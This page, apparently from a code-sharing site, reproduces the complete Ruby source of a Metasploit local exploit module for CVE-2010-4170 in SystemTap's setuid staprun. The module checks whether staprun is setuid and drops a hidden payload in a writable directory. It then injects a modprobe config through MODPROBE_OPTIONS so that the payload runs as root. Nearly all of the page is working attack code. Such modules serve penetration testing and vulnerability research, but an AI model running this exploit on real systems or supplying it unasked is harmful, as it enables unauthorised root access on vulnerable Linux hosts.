扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation', 'Description'=> %q{ This module attempts to gain root privileges by exploiting a vulnerability in the <code>staprun</code> executable included with SystemTap version 1.3. The <code>staprun</code> executable does not clear environment variables prior to executing <code>modprobe</code>, allowing an arbitrary configuration file to be specified in the <code>MODPROBE_OPTIONS</code> environment variable, resulting in arbitrary command execution with root privileges. This module has been tested successfully on: systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and systemtap 1.1-3.el5 on RHEL 5.5 (x64). }, 'License'=> MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2010-11-17', 'References' => [ ['BID', '44914'], ['CVE', '2010-4170'], ['EDB', '15620'], ['URL', 'https://securitytracker.com/id?1024754'], ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'], ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'], ['URL', 'https://bugs.launchpad.net/bugs/677226'], ['URL', 'https://www.debian.org/security/2011/dsa-2348'] ], 'Platform' => ['linux'], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, ARCH_PPC, ARCH_MIPSLE, ARCH_MIPSBE ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets'=> [['Auto', {}]], 'DefaultTarget'=> 0)) register_options [ OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def staprun_path datastore['STAPRUN_PATH'] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data chmod path end def check # On some systems, staprun execution is restricted to stapusr group: # ---s--x---. 1 root stapusr 178488 Mar 282014 /usr/bin/staprun unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true' vprint_error "#{staprun_path} is not executable" return CheckCode::Safe end vprint_good "#{staprun_path} is executable" unless setuid? staprun_path vprint_error "#{staprun_path} is not setuid" return CheckCode::Safe end vprint_good "#{staprun_path} is setuid" CheckCode::Detected end def exploit unless check == CheckCode::Detected unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end payload_name = ".#{rand_text_alphanumeric 10..15}" payload_path = "#{base_dir}/#{payload_name}" upload_and_chmodx payload_path, generate_payload_exe config_path = "#{base_dir}/#{payload_name}.conf" upload config_path, "install uprobes /bin/sh" print_status 'Executing payload...' res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}" vprint_line res end end |
体验盒子
